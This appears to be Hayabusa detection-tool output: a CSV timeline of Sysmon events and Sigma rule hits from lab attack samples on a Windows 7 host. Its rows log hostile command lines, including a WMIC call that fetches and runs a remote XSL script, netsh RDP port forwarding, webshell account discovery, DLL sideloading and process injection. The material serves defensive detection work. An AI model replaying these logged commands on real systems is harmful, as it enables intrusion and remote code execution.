2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Exec,Suspicious WMI Reconnaissance,,rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.736 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:05.862 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wbem\WMIC.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:07.731 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\x50IGVBRfr55_test[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:07.731 +09:00,IEWIN7,11,high,,Windows Shell File Write to Suspicious Folder,,rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx
2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
